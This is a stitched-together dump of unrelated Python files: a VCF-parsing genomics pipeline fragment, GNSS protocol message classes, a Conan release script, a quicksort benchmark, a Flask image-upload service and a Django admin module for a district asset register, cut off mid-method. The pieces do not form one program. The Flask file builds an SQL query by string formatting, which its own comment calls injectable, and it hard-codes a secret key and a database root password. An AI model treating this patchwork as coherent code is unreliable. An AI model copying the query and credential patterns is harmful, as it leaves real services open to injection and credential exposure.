                    filename = os.path.split(target)[1]
                    fileNoExt = filename.split(".")[0]
                    megaName = "rL%s_fC%s_%s_kmer%s" % (rLength, fCov, fileNoExt, size)
                    filePath = "%s/tmp/rL%s/rL%s_fC%s" % (path, rLength, rLength, fCov)
                    vcfFile = megaName + "_sorted.vcf"
                    newPath = "%s/%s" % (filePath, megaName)
                    outputFile = "%s/%s" % (newPath, vcfFile)
                    # Initialise the counter, which will be used to track lines in the vcf file - if positions in the
                    # target are not mapped, then the position field will jump ahead of the counter
                    count = 1
                    # Initialise the arrays, which will keep track of the appropriate values for each dataset
                    arrQual = []
                    arrCov = []
                    arrSum = []
                    output = open(outputFile, "r")
                    for line in output:
                        # vcf files have 36 commented out lines at the top of each file - these are not necessary
                        if re.search('#', line):
                            pass
                        else:
                            total1 += 1
                            # Format of file
                            # CHROM	POS	ID	REF	ALT	QUAL	FILTER	INFO	FORMAT
                            # adk-12	8	.	G	.	32.7	.	DP=1;AF1=0;AC1=0;DP4=0,1,0,0;MQ=29;FQ=-30.3	PL	0
                            # data[0] [1]	[2]	[3]	[4]	[5]	[6]	[7]
                            data = line.split("\t")
                            #target = data[0]
                            pos = data[1]
                            refSeq = data[3]
                            mapSeq = data[4]
                            qual = data[5]
                            # Depth of coverage is reported prior to the first ";"
                            dpLine = data[7].split(";")[0]
                            # For now, I'm skipping lines that indicated the presence of a possible indel
                            # - I may return to this later
                            if re.search("INDEL", dpLine):
                                pass
                            else:
                                # If the called base (mapSeq) is identical to the reference base (refSeq)
                                # - denoted by a ".", then set seq to equal refSeq, otherwise, pull the
                                # value of mapSeq for seq
                                # NOTE(review): this avgQual is overwritten by
                                # the summary computation below and appears to
                                # be dead code here.
                                avgQual = sum(arrQual)/total1
                                if mapSeq == ".":
                                    seq = refSeq
                                    match = 1
                                # This section corrects for the fact that during the conversion of bam files to vcf
                                # files, SNP calls and ambiguous calls look identical, except for the fact that for
                                # SNPs, the qualityScore (qual) tends to be higher than the surrounding bases,
                                # while ambiguous calls have a lower qualityScore - this loop screens for quality
                                # scores that are at least 10 lower than the score of the previous base
                                else:
                                    # NOTE(review): arrQual[-1] raises
                                    # IndexError if the very first data line is
                                    # a non-reference call -- confirm inputs
                                    # always start with reference calls.
                                    if float(arrQual[-1] - 10) >= 0:
                                        prevValue = float(arrQual[-1] - 10)
                                    else:
                                        prevValue = 0
                                    if float(qual) <= prevValue:
                                        seq = refSeq
                                        match = 1
                                    else:
                                        # This attempts to catch if there are two ambiguous bases in a row;
                                        # they will hopefully have the same value
                                        if float(qual) == prevValue:
                                            seq = refSeq
                                            match = 1
                                        else:
                                            # "True" SNPs seem to have increased qualityScore compared to the
                                            # surrounding values, this will catch that
                                            if float(qual) > prevValue:
                                                seq = mapSeq
                                                match = 0
                                # Strip the "DP=" from dpLine
                                DP = dpLine.split("=")[1]
                                #vcfData[pos] = (fileName, target, refSeq, mapSeq, DP)
                                # If pos > count, then there is a gap in the mapping (or a deletion, but ignoring
                                # this possibility for now). For my purposes, I want to have data reported for
                                # every position, whether it is present in the vcf file or not, so I will use count
                                # as the position, "-" as the seq, and 0 as the quality and depth of coverage
                                if int(pos) > count:
                                    #print int(pos) - count, pos, count, range(count, int(pos))
                                    # the number of skipped positions is equal to the value for pos - count
                                    # For each skipped position (i), set appropriate variables to appropriate values
                                    for i in range(count, int(pos)):
                                        posAdj = count
                                        seqAdj = "-"
                                        matchAdj = 0
                                        qualAdj = 0
                                        DPAdj = 0
                                        #vcfData[fileName][rL][fC][target][size][int(posAdj)][seqAdj][matchAdj][qualAdj] = DP
                                        arrQual.append(float(qualAdj))
                                        arrCov.append(float(DPAdj))
                                        arrSum.append(float(matchAdj))
                                        count += 1
                                    if int(pos) == count:
                                        #vcfData[fileName][rL][fC][target][size][int(pos)][seq][match][qual] = DP
                                        arrQual.append(float(qual))
                                        arrCov.append(float(DP))
                                        arrSum.append(float(match))
                                        count += 1
                                else:
                                    #vcfData[fileName][rL][fC][target][size][int(pos)][seq][match][qual] = DP
                                    arrQual.append(float(qual))
                                    arrCov.append(float(DP))
                                    arrSum.append(float(match))
                                    count += 1
                    # In the case of no data being present in a file,
                    total = count - 1
                    if total == 0:
                        avgQual = 0
                        stdQual = 0
                        avgCov = 0
                        stdCov = 0
                        avgID = 0
                        qualMet = 0
                    else:
                        # Per-position means / standard deviations over the
                        # filled arrays; qualMet combines quality and depth.
                        avgQual = sum(arrQual)/total
                        stdQual = numpy.std(arrQual)
                        avgCov = sum(arrCov)/total
                        stdCov = numpy.std(arrCov)
                        avgID = sum(arrSum)/total * 100
                        qualMet = avgQual * avgCov
                    outFile.write("%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n"
                                  % (rLength, fCov, fileNoExt, size, avgQual, stdQual, avgCov, stdCov, avgID, qualMet))
                    output.close()
    outFile.close()
def pipeline():
    """Calls all the functions in a way that they can be multi-processed"""
    # Simulated reads are generated once per reference genome.
    for reference in references:
        createSimulatedFilesProcesses(reference)
    # The remaining stages run in order over everything generated above:
    # faidx, index, map, sort, bam-index, vcf, and finally the summary.
    for stage in (faidxTargetsProcesses,
                  indexTargets,
                  mappingProcesses,
                  sortingProcesses,
                  bamIndexingProcesses,
                  createVCFProcesses,
                  createOutputFiles):
        stage()
# Wall-clock start time; also used by createOutputFiles to name the
# summary file.
start = time.time()
pipeline()
print "\nElapsed Time: %s seconds" % (time.time() - start) |
from enum import IntEnum
from construct import (Struct, Int64ul, Int16ul, Int8ul, Padding, this, Bytes, PaddedString)
from ..utils.construct_utils import AutoEnum
from .defs import *
class CommandResponseMessage(MessagePayload):
    """!
    @brief Response to indicate if command was processed successfully.
    """
    MESSAGE_TYPE = MessageType.COMMAND_RESPONSE
    MESSAGE_VERSION = 0

    _STRUCT = struct.Struct('<IB3x')

    def __init__(self):
        self.source_sequence_num = 0
        self.response = Response.OK

    def pack(self, buffer: bytes = None, offset: int = 0, return_buffer: bool = True) -> (bytes, int):
        """!
        @brief Serialize this message into @c buffer at @c offset.
        @return The buffer if @c return_buffer is set, otherwise the number of bytes written.
        """
        if buffer is None:
            buffer = bytearray(self.calcsize())

        initial_offset = offset
        self._STRUCT.pack_into(buffer, offset, self.source_sequence_num, self.response)
        # Bug fix: advance the offset instead of overwriting it with the struct
        # size (`offset = self._STRUCT.size`), which returned a wrong byte count
        # whenever a non-zero starting offset was passed in.
        offset += self._STRUCT.size

        if return_buffer:
            return buffer
        else:
            return offset - initial_offset

    def unpack(self, buffer: bytes, offset: int = 0) -> int:
        """!
        @brief Deserialize from @c buffer starting at @c offset.
        @return The number of bytes consumed.
        """
        initial_offset = offset
        (self.source_sequence_num, self.response) = \
            self._STRUCT.unpack_from(buffer=buffer, offset=offset)
        # Bug fix: advance (`+=`) rather than assign, matching pack().
        offset += self._STRUCT.size

        # Map the raw integer onto the Response enum when possible; leave the
        # raw value in place for unrecognized codes (forward compatibility).
        try:
            self.response = Response(self.response)
        except ValueError:
            pass

        return offset - initial_offset

    @classmethod
    def calcsize(cls) -> int:
        return cls._STRUCT.size

    def __str__(self):
        string = f'Command Response\n'
        string += f'  Sequence number: {self.source_sequence_num}\n'
        if isinstance(self.response, Response):
            string += f'  Response: {str(self.response)} ({int(self.response)})'
        else:
            string += f'  Response: UNKNOWN ({int(self.response)})'
        return string
class MessageRequest(MessagePayload):
    """!
    @brief Request transmission of a specified message type.
    """
    MESSAGE_TYPE = MessageType.MESSAGE_REQUEST
    MESSAGE_VERSION = 0

    _STRUCT = struct.Struct('<H2x')

    def __init__(self, message_type: MessageType = MessageType.INVALID):
        self.message_type: MessageType = message_type

    def pack(self, buffer: bytes = None, offset: int = 0, return_buffer: bool = True) -> (bytes, int):
        """!
        @brief Serialize this message into @c buffer at @c offset.
        @return The buffer if @c return_buffer is set, otherwise the number of bytes written.
        """
        if buffer is None:
            buffer = bytearray(self.calcsize())

        initial_offset = offset
        self._STRUCT.pack_into(buffer, offset, self.message_type.value)
        offset += self._STRUCT.size

        if return_buffer:
            return buffer
        else:
            return offset - initial_offset

    def unpack(self, buffer: bytes, offset: int = 0) -> int:
        """!
        @brief Deserialize from @c buffer starting at @c offset.
        @return The number of bytes consumed.
        """
        initial_offset = offset
        (message_type,) = self._STRUCT.unpack_from(buffer=buffer, offset=offset)
        # Bug fix: struct.Struct exposes `.size`; `._SIZE` does not exist and
        # raised AttributeError on every unpack() call.
        offset += self._STRUCT.size
        self.message_type = MessageType(message_type)
        return offset - initial_offset

    def __repr__(self):
        return '%s' % self.MESSAGE_TYPE.name

    def __str__(self):
        return 'Transmission request for message %s.' % MessageType.get_type_string(self.message_type)

    @classmethod
    def calcsize(cls) -> int:
        return cls._STRUCT.size
class ResetRequest(MessagePayload):
    """!
    @brief Perform a software or hardware reset.
    """
    MESSAGE_TYPE = MessageType.RESET_REQUEST
    MESSAGE_VERSION = 0

    ##
    # @name Runtime State Reset
    # @{
    ## Restart the navigation engine, but do not clear its position estimate.
    RESTART_NAVIGATION_ENGINE = 0x00000001
    ## Delete all GNSS corrections information.
    RESET_GNSS_CORRECTIONS = 0x00000002
    ## @}

    ##
    # @name Clear Short Lived Data
    # @{
    ## Reset the navigation engine's estimate of position, velocity, and orientation.
    RESET_POSITION_DATA = 0x00000100
    ## Delete all saved satellite ephemeris.
    RESET_EPHEMERIS = 0x00000200
    ## Reset bias estimates, and other IMU corrections that are typically estimated quickly.
    RESET_FAST_IMU_CORRECTIONS = 0x00000400
    ## @}

    ##
    # @name Clear Long Lived Data
    # @{
    ##
    # Reset all stored navigation engine data, including position, velocity, and orientation state, as well as all IMU
    # corrections (fast and slow) and other training data.
    RESET_NAVIGATION_ENGINE_DATA = 0x00001000
    ##
    # Reset the device calibration data.
    #
    # @note
    # This does _not_ reset any existing navigation engine state. It is recommended that you set @ref
    # RESET_NAVIGATION_ENGINE_DATA as well under normal circumstances.
    RESET_CALIBRATION_DATA = 0x00002000
    ## @}

    ##
    # @name Clear Configuration Data
    # @{
    ## Clear all configuration data.
    RESET_CONFIG = 0x00100000
    ## @}

    ##
    # @name Restart Hardware Modules
    # @{
    ## Restart the GNSS measurement engine.
    RESTART_GNSS_MEASUREMENT_ENGINE = 0x01000000
    ## @}

    ##
    # @name Device Reset Bitmasks
    # @{
    ##
    # Perform a device hot start.
    #
    # A hot start is typically used to restart the navigation engine in a
    # deterministic state, particularly for logging purposes.
    #
    # To be reset:
    # - The navigation engine (@ref RESTART_NAVIGATION_ENGINE)
    # - All runtime data (GNSS corrections (@ref RESET_GNSS_CORRECTIONS), etc.)
    #
    # Not reset:
    # - Position, velocity, orientation (@ref RESET_POSITION_DATA)
    # - Calibration data (@ref RESET_CALIBRATION_DATA)
    # - User configuration settings (@ref RESET_CONFIG)
    # - GNSS Measurement engine hardware (@ref RESTART_GNSS_MEASUREMENT_ENGINE)
    HOT_START = 0x000000FF

    ##
    # Perform a device warm start.
    #
    # A warm start is typically used to reset the device's estimate of position
    # and kinematic state in case of error.
    #
    # To be reset:
    # - The navigation engine (@ref RESTART_NAVIGATION_ENGINE)
    # - All runtime data (GNSS corrections (@ref RESET_GNSS_CORRECTIONS), etc.)
    # - Position, velocity, orientation (@ref RESET_POSITION_DATA)
    #
    # Not reset:
    # - Fast IMU corrections (@ref RESET_FAST_IMU_CORRECTIONS)
    # - Training parameters (slowly estimated IMU corrections, temperature
    #   compensation, etc.; @ref RESET_NAVIGATION_ENGINE_DATA)
    # - Calibration data (@ref RESET_CALIBRATION_DATA)
    # - User configuration settings (@ref RESET_CONFIG)
    # - GNSS Measurement engine hardware (@ref RESTART_GNSS_MEASUREMENT_ENGINE)
    WARM_START = 0x000001FF

    ##
    # Perform a device cold start.
    #
    # A cold start is typically used to reset the device's state estimate in the
    # case of error that cannot be resolved by a @ref WARM_START.
    #
    # To be reset:
    # - The navigation engine (@ref RESTART_NAVIGATION_ENGINE)
    # - All runtime data (GNSS corrections (@ref RESET_GNSS_CORRECTIONS), etc.)
    # - Position, velocity, orientation (@ref RESET_POSITION_DATA)
    # - Fast IMU corrections (@ref RESET_FAST_IMU_CORRECTIONS)
    # - GNSS Measurement engine hardware (@ref RESTART_GNSS_MEASUREMENT_ENGINE)
    #
    # Not reset:
    # - Training parameters (slowly estimated IMU corrections, temperature
    #   compensation, etc.; @ref RESET_NAVIGATION_ENGINE_DATA)
    # - Calibration data (@ref RESET_CALIBRATION_DATA)
    # - User configuration settings (@ref RESET_CONFIG)
    #
    # @note
    # To reset training or calibration data as well, set the @ref
    # RESET_NAVIGATION_ENGINE_DATA and @ref RESET_CALIBRATION_DATA bits.
    COLD_START = 0x01000FFF

    ##
    # Restart mask to set all persistent data, including calibration and user configuration, back to factory defaults.
    #
    # Note: Upper 8 bits reserved for future use (e.g., hardware reset).
    FACTORY_RESET = 0x01FFFFFF
    ## @}

    _STRUCT = struct.Struct('<I')

    def __init__(self, reset_mask: int = 0):
        self.reset_mask = reset_mask

    def pack(self, buffer: bytes = None, offset: int = 0, return_buffer: bool = True) -> (bytes, int):
        """!
        @brief Serialize this message into @c buffer at @c offset.
        @return The buffer if @c return_buffer is set, otherwise the number of bytes written.
        """
        if buffer is None:
            buffer = bytearray(self.calcsize())

        self._STRUCT.pack_into(buffer, offset, self.reset_mask)

        if return_buffer:
            return buffer
        else:
            return self.calcsize()

    def unpack(self, buffer: bytes, offset: int = 0) -> int:
        """!
        @brief Deserialize from @c buffer starting at @c offset.
        @return The number of bytes consumed.
        """
        initial_offset = offset
        (self.reset_mask,) = \
            self._STRUCT.unpack_from(buffer=buffer, offset=offset)
        # Bug fix: `ResetRequest._SIZE` does not exist (AttributeError on every
        # unpack). The consumed byte count is the packed struct size.
        offset += self._STRUCT.size
        return offset - initial_offset

    @classmethod
    def calcsize(cls) -> int:
        return cls._STRUCT.size

    def __str__(self):
        return 'Reset Request [mask=0x%08x]' % self.reset_mask
class VersionInfoMessage(MessagePayload):
    """!
    @brief Software and hardware version information.

    Serialized with the `construct` library: four length bytes precede the
    four UTF-8 version strings.
    """
    MESSAGE_TYPE = MessageType.VERSION_INFO
    MESSAGE_VERSION = 0

    VersionInfoMessageConstruct = Struct(
        "system_time_ns" / Int64ul,
        "fw_version_length" / Int8ul,
        "engine_version_length" / Int8ul,
        "hw_version_length" / Int8ul,
        "rx_version_length" / Int8ul,
        Padding(4),
        "fw_version_str" / PaddedString(this.fw_version_length, 'utf8'),
        "engine_version_str" / PaddedString(this.engine_version_length, 'utf8'),
        "hw_version_str" / PaddedString(this.hw_version_length, 'utf8'),
        "rx_version_str" / PaddedString(this.rx_version_length, 'utf8'),
    )

    def __init__(self):
        self.system_time_ns = 0
        self.fw_version_str = ""
        self.engine_version_str = ""
        self.hw_version_str = ""
        self.rx_version_str = ""

    def pack(self, buffer: bytes = None, offset: int = 0, return_buffer: bool = True) -> (bytes, int):
        """!
        @brief Serialize this message; string length fields are derived from
               the current attribute values at pack time.
        """
        values = {
            'system_time_ns': self.system_time_ns,
            'fw_version_str': self.fw_version_str,
            'engine_version_str': self.engine_version_str,
            'hw_version_str': self.hw_version_str,
            'rx_version_str': self.rx_version_str,
            'fw_version_length': len(self.fw_version_str),
            'engine_version_length': len(self.engine_version_str),
            'hw_version_length': len(self.hw_version_str),
            'rx_version_length': len(self.rx_version_str),
        }
        packed_data = self.VersionInfoMessageConstruct.build(values)
        return PackedDataToBuffer(packed_data, buffer, offset, return_buffer)

    def unpack(self, buffer: bytes, offset: int = 0) -> int:
        """!
        @brief Deserialize from @c buffer starting at @c offset.
        @return The number of bytes consumed.
        """
        parsed = self.VersionInfoMessageConstruct.parse(buffer[offset:])
        self.__dict__.update(parsed)
        return parsed._io.tell()

    def __str__(self):
        lines = [
            'Version Info @ %s' % system_time_to_str(self.system_time_ns),
            '  Firmware: %s' % self.fw_version_str,
            '  FusionEngine: %s' % self.engine_version_str,
            '  Hardware: %s' % self.hw_version_str,
            '  GNSS receiver: %s' % self.rx_version_str,
        ]
        return '\n'.join(lines)

    def calcsize(self) -> int:
        # Variable-length message: the size is whatever a fresh pack() produces.
        return len(self.pack())
class EventNotificationMessage(MessagePayload):
    """!
    @brief Notification of a system event for logging purposes.
    """
    MESSAGE_TYPE = MessageType.EVENT_NOTIFICATION
    MESSAGE_VERSION = 0

    class Action(IntEnum):
        LOG = 0
        RESET = 1
        CONFIG_CHANGE = 2

        def __str__(self):
            # Render as "LOG" instead of "Action.LOG".
            return super().__str__().replace(self.__class__.__name__ + '.', '')

    EventNotificationConstruct = Struct(
        "action" / AutoEnum(Int8ul, Action),
        Padding(3),
        "system_time_ns" / Int64ul,
        "event_flags" / Int64ul,
        "event_description_len_bytes" / Int16ul,
        Padding(2),
        "event_description" / Bytes(this.event_description_len_bytes),
    )

    def __init__(self):
        self.action = self.Action.LOG
        self.system_time_ns = 0
        self.event_flags = 0
        self.event_description = bytes()

    def pack(self, buffer: bytes = None, offset: int = 0, return_buffer: bool = True) -> (bytes, int):
        """!
        @brief Serialize this message; the description length field is derived
               at pack time from the current description bytes.
        """
        values = {**self.__dict__, 'event_description_len_bytes': len(self.event_description)}
        packed_data = self.EventNotificationConstruct.build(values)
        return PackedDataToBuffer(packed_data, buffer, offset, return_buffer)

    def unpack(self, buffer: bytes, offset: int = 0) -> int:
        """!
        @brief Deserialize from @c buffer starting at @c offset.
        @return The number of bytes consumed.
        """
        parsed = self.EventNotificationConstruct.parse(buffer[offset:])
        self.__dict__.update(parsed)
        return parsed._io.tell()

    def __str__(self):
        string = 'Event Notification @ %s\n' % system_time_to_str(self.system_time_ns)
        for name in ('action', 'event_flags', 'event_description'):
            value = str(getattr(self, name)).replace('Container:', '')
            string += '  %s: %s\n' % (name, value)
        return string.rstrip()

    def calcsize(self) -> int:
        # Variable-length message: the size is whatever a fresh pack() produces.
        return len(self.pack())
|
import importlib
import os
import re
import sys
from cpt.packager import ConanMultiPackager
# Load scripts/common.py by path as module "comm" (it is not on sys.path).
spec = importlib.util.spec_from_file_location('comm', 'scripts/common.py')
mod = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod)
def _require_env(name, message):
    """Return the value of environment variable *name*, raising when unset/empty."""
    value = os.getenv(name)
    if not value:
        raise Exception(message)
    return value


if __name__ == "__main__":
    # Mandatory CI configuration.
    projname = _require_env('CONAN_PACKAGE_NAME', 'CONAN_PACKAGE_NAME environment variable not defined')
    username = _require_env('CONAN_USERNAME', 'CONAN_USERNAME environment variable not defined')
    branch = _require_env('TRAVIS_BRANCH', 'TRAVIS_BRANCH environment variable not defined (are you not releasing on Travis?)')

    # Dev branches publish to the "nightly" channel, release branches to "stable".
    matched, projver = mod.is_dev_branch()
    channel = 'nightly'
    if not matched:
        matched, projver = mod.is_rel_branch()
        channel = 'stable'

    if not matched:
        print('Not release or development branch, ignoring release!')
    else:
        builder = ConanMultiPackager(reference=f'{projname}/{projver}@{username}/{channel}')
        builder.add({}, {}, {}, {})
        builder.run()
|
import numpy as np
from time import process_time_ns as ns
def partition(v, b, e):
    """Lomuto-style in-place partition of v[b..e] around pivot v[b].

    Elements <= the pivot end up to its left; returns the pivot's final index.
    """
    pivot = v[b]  # v[b] is never moved during the scan, so it can be hoisted
    boundary = b  # last index known to hold a value <= pivot
    for idx in range(b + 1, e + 1):
        if v[idx] <= pivot:
            boundary += 1
            v[idx], v[boundary] = v[boundary], v[idx]
    # Put the pivot between the two regions.
    v[boundary], v[b] = v[b], v[boundary]
    return boundary
def sort(v, b=0, e=None):
    """Quicksort *v* in place over the inclusive index range [b, e].

    *e* defaults to the last index. Returns None.
    """
    if e is None:
        e = len(v) - 1

    def _quick(lo, hi):
        if lo >= hi:           # zero or one element: nothing to do
            return
        mid = partition(v, lo, hi)   # pivot lands at its final position
        _quick(lo, mid - 1)
        _quick(mid + 1, hi)

    return _quick(b, e)
def main(*args):
    """Benchmark quicksort on random, ascending, and descending inputs.

    Prints the elapsed nanoseconds for each of the three orderings.
    """
    randomized = np.random.randint(1, 100, 100)
    # Derive the ordered variants before sort() mutates the random array.
    ascending = sorted(randomized)
    descending = sorted(randomized, reverse=True)
    for data in (randomized, ascending, descending):
        began = ns()
        sort(data)
        print(ns() - began)
# Run the benchmark only when executed as a script.
if __name__ == '__main__':
    main()
# coding=utf-8
import os
import urllib.request
from flask import Flask, flash, request, redirect, jsonify
from flask import send_from_directory
from werkzeug.utils import secure_filename
import uuid
from cv_code import blur_image
from db_code import Database
# set host address, allow all ip addresses
HOST = '0.0.0.0'
# uploaded file extension allowed filtering set
ALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])
# uploaded file saving path
# uploads/src: original image
# uploads/dst: after image processing image
UPLOAD_FOLDER = '/uploads'
# flask setting
app = Flask(__name__, template_folder='template')
# NOTE(review): hard-coded secret key; load from environment/config in production.
app.secret_key = "secret key"
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
# maximum request body size: 16 MiB
app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024
# static directory path
static_file_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'static')
uploads_file_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'uploads')
# init database
# NOTE(review): hard-coded database credentials; move to configuration.
mysql_db = Database({
    'db_host': '127.0.0.1',
    'db_user': 'root',
    'db_password': 'dongdong',
    'db_port': 3306,
    'db_name': 'mysql-example'
})
# route: API/
@app.route('/', methods=['GET'])
def serve_dir_directory_index():
    """Serve the static index page."""
    return send_from_directory(static_file_dir, 'index.html')
# route: API/*
@app.route('/<path:path>', methods=['GET'])
def serve_file_in_dir(path):
    """Serve a static file; fall back to the path's index.html when missing."""
    if not os.path.isfile(os.path.join(static_file_dir, path)):
        path = os.path.join(path, 'index.html')
    return send_from_directory(static_file_dir, path)
# route: API/uploads/*
@app.route('/uploads/<path:path>', methods=['GET'])
def serve_file_in_upload(path):
    """Serve an uploaded (original or processed) image from the uploads dir."""
    return send_from_directory(uploads_file_dir, path)
# filtering file extension
def allowed_file(filename):
    """Return True when *filename* has an extension listed in ALLOWED_EXTENSIONS."""
    if '.' not in filename:
        return False
    extension = filename.rsplit('.', 1)[1]
    return extension.lower() in ALLOWED_EXTENSIONS
# get file extension
def get_extension(filename):
    """Return the lower-cased extension of *filename*, or '' when it has none.

    Bug fix: the original indexed `rsplit('.', 1)[1]` unconditionally, which
    raised IndexError for filenames without a dot; returning '' makes the
    helper total while keeping existing behavior for dotted names.
    """
    parts = filename.rsplit('.', 1)
    return parts[1].lower() if len(parts) == 2 else ''
# save image url to database
# save image url to database
def save_image_url(original_url, result_url):
    # NOTE(review): SQL built via string formatting. The URLs embed the
    # extension of the user-supplied filename, so this is injectable; switch
    # to a parameterized query if Database.run_query supports placeholders —
    # TODO confirm its API.
    sql = "INSERT INTO `image` (`original_url`, `result_url`) VALUES ('{!s}', '{!s}')".format(original_url, result_url)
    mysql_db.run_query(sql)
# route: API/api/upload
@app.route('/api/upload', methods=['POST'])
def upload_file():
    """Accept an uploaded image, store it, blur it, and return the result URL.

    JSON responses: code 10040 when no file part is present, code 10050 for a
    disallowed extension, code 200 with `result_url` on success.
    """
    if request.method == 'POST':
        # Request host without the port; used to build the absolute result URL.
        request_ip = request.host.split(':')[0]
        # check if the post request has the file part
        if 'file' not in request.files:
            dst = {
                'msg': 'no files',
                'code': 10040
            }
            return jsonify(dst)
        # get file param
        file = request.files['file']
        # Bug fix: validate the extension BEFORE deriving it. The original code
        # called get_extension() first, which raised IndexError for filenames
        # without a dot instead of returning the 10050 error response below.
        if file and allowed_file(file.filename):
            # Random server-side name avoids collisions and path traversal.
            filename = str(uuid.uuid4()) + '.' + str(get_extension(file.filename))
            original_url = app.config['UPLOAD_FOLDER'] + '/src/' + filename
            result_url = app.config['UPLOAD_FOLDER'] + '/dst/' + filename
            # save original file to uploads/src folder
            file.save(os.path.join('.' + original_url))
            # save image urls to database
            save_image_url(original_url, result_url)
            # blur the image file by opencv code; output goes to uploads/dst
            blur_image(filename)
            # return result image file url
            dst = {
                'msg': 'upload file success',
                'code': 200,
                'result_url': 'http://'+request_ip+':5000/uploads/dst/' + filename
            }
            return jsonify(dst)
        else:
            # return error message
            dst = {
                'msg': 'file type not allowed',
                'code': 10050
            }
            return jsonify(dst)
if __name__ == "__main__":
    # run for any ip address
    # NOTE(review): Flask development server; use a WSGI server in production.
    app.run(host=HOST, port=5000)
|
from .models import Model

# Re-export Model as the package's public API.
__all__ = ["Model"]
|
import wxbot

# Start the bot's blocking event loop (does not return under normal operation).
wxbot.main_loop()
|
### $Id: admin.py,v 1.15 2017/12/04 08:16:37 muntaza Exp $
from django.contrib import admin
from umum.models import Provinsi, Kabupaten, LokasiBidang, SKPD, SUBSKPD, KodeBarang, HakTanah, SatuanBarang, KeadaanBarang, SKPenghapusan, MutasiBerkurang, JenisPemanfaatan, AsalUsul, Tahun, GolonganBarang, Tanah, KontrakTanah, PenghapusanTanah, TanahPenghapusan, PemanfaatanTanah, TanahPemanfaatan, HargaTanah
#### Tanah
from umum.models import TanahDisdikSMPN2Halong, HargaTanahDisdikSMPN2Halong
from umum.admin import HargaTanahInline, TanahAdmin, KontrakTanahAdmin, HargaTanahAdmin
from umum.admin import GedungBangunanInline
#### Gedung Bangunan
from gedungbangunan.models import StatusTingkat, StatusBeton, KontrakGedungBangunan, HargaGedungBangunan, GedungBangunan, PenghapusanGedungBangunan, PemanfaatanGedungBangunan, TahunBerkurangGedungBangunan, Ruangan
from gedungbangunan.models import GedungBangunanPemanfaatan, GedungBangunanPenghapusan, GedungBangunanRuangan
from gedungbangunan.models import GedungBangunanDisdikSMPN2Halong, HargaGedungBangunanDisdikSMPN2Halong, GedungBangunanRuanganDisdikSMPN2Halong
from gedungbangunan.admin import HargaGedungBangunanInline, GedungBangunanAdmin, KontrakGedungBangunanAdmin, HargaGedungBangunanAdmin, RuanganInline, GedungBangunanRuanganAdmin
#### Peralatan Mesin
from peralatanmesin.models import KontrakPeralatanMesin, HargaPeralatanMesin, PeralatanMesin, PenghapusanPeralatanMesin, PemanfaatanPeralatanMesin, TahunBerkurangPeralatanMesin
#untuk menampung inline
from peralatanmesin.models import PeralatanMesinPemanfaatan, PeralatanMesinPenghapusan
from peralatanmesin.models import PeralatanMesinDisdikSMPN2Halong, HargaPeralatanMesinDisdikSMPN2Halong
from peralatanmesin.admin import HargaPeralatanMesinInline, PeralatanMesinAdmin, KontrakPeralatanMesinAdmin, HargaPeralatanMesinAdmin
#### Class Tanah
class GedungBangunanDisdikSMPN2HalongInline(GedungBangunanInline):
    """Building (gedung/bangunan) inline scoped to SMPN 2 Halong."""
    model = GedungBangunanDisdikSMPN2Halong
class HargaTanahDisdikSMPN2HalongInline(HargaTanahInline):
    """Land-price inline for SMPN 2 Halong."""
    model = HargaTanahDisdikSMPN2Halong

    def formfield_for_foreignkey(self, db_field, request, **kwargs):
        # Restrict the contract dropdown to contracts owned by SKPD id 7.
        if db_field.name == "id_kontrak":
            kwargs["queryset"] = KontrakTanah.objects.filter(id_skpd__exact=7)
        return super(HargaTanahDisdikSMPN2HalongInline, self).formfield_for_foreignkey(db_field, request, **kwargs)
class TanahDisdikSMPN2HalongAdmin(TanahAdmin):
    """Land (tanah) admin limited to sub-SKPD 105 (SMPN 2 Halong)."""
    inlines = [HargaTanahDisdikSMPN2HalongInline]

    def formfield_for_foreignkey(self, db_field, request, **kwargs):
        # Only offer sub-SKPD 105 in the dropdown.
        if db_field.name == "id_sub_skpd":
            qs_id_sub_skpd=105
            kwargs["queryset"] = SUBSKPD.objects.filter(id__exact=qs_id_sub_skpd)
        return super(TanahDisdikSMPN2HalongAdmin, self).formfield_for_foreignkey(db_field, request, **kwargs)

    def get_queryset(self, request):
        # Only records of sub-SKPD 105 with mutation status 5.
        # NOTE(review): the meaning of id_mutasi_berkurang=5 is not visible here — confirm.
        qs_id_sub_skpd=105
        return self.model.objects.filter(id_sub_skpd__exact=qs_id_sub_skpd).filter(id_mutasi_berkurang__exact=5)
class HargaTanahDisdikSMPN2HalongAdmin(HargaTanahAdmin):
    """Land-price admin restricted to land records under sub-SKPD 105."""
    def get_queryset(self, request):
        qs_id_sub_skpd=105
        tanah_qs = Tanah.objects.filter(id_sub_skpd__exact=qs_id_sub_skpd)
        return self.model.objects.filter(id_tanah__in=tanah_qs)

### Register Tanah DisdikSMPN2Halong
admin.site.register(TanahDisdikSMPN2Halong, TanahDisdikSMPN2HalongAdmin)
admin.site.register(HargaTanahDisdikSMPN2Halong, HargaTanahDisdikSMPN2HalongAdmin)
#### Class Gedung dan Bangunan
class HargaGedungBangunanDisdikSMPN2HalongInline(HargaGedungBangunanInline):
    """Building-price inline for SMPN 2 Halong."""
    model = HargaGedungBangunanDisdikSMPN2Halong

    def formfield_for_foreignkey(self, db_field, request, **kwargs):
        # Restrict the contract dropdown to contracts owned by SKPD id 7.
        if db_field.name == "id_kontrak_gedung_bangunan":
            kwargs["queryset"] = KontrakGedungBangunan.objects.filter(id_skpd__exact=7)
        return super(HargaGedungBangunanDisdikSMPN2HalongInline, self).formfield_for_foreignkey(db_field, request, **kwargs)
class GedungBangunanDisdikSMPN2HalongAdmin(GedungBangunanAdmin):
    """Building admin limited to sub-SKPD 105 and golongan barang 3."""
    inlines = [HargaGedungBangunanDisdikSMPN2HalongInline]

    def formfield_for_foreignkey(self, db_field, request, **kwargs):
        # Only offer sub-SKPD 105 in the dropdown.
        if db_field.name == "id_sub_skpd":
            qs_id_sub_skpd=105
            kwargs["queryset"] = SUBSKPD.objects.filter(id__exact=qs_id_sub_skpd)
        return super(GedungBangunanDisdikSMPN2HalongAdmin, self).formfield_for_foreignkey(db_field, request, **kwargs)

    def get_queryset(self, request):
        # Only sub-SKPD 105, golongan barang 3, mutation status 5.
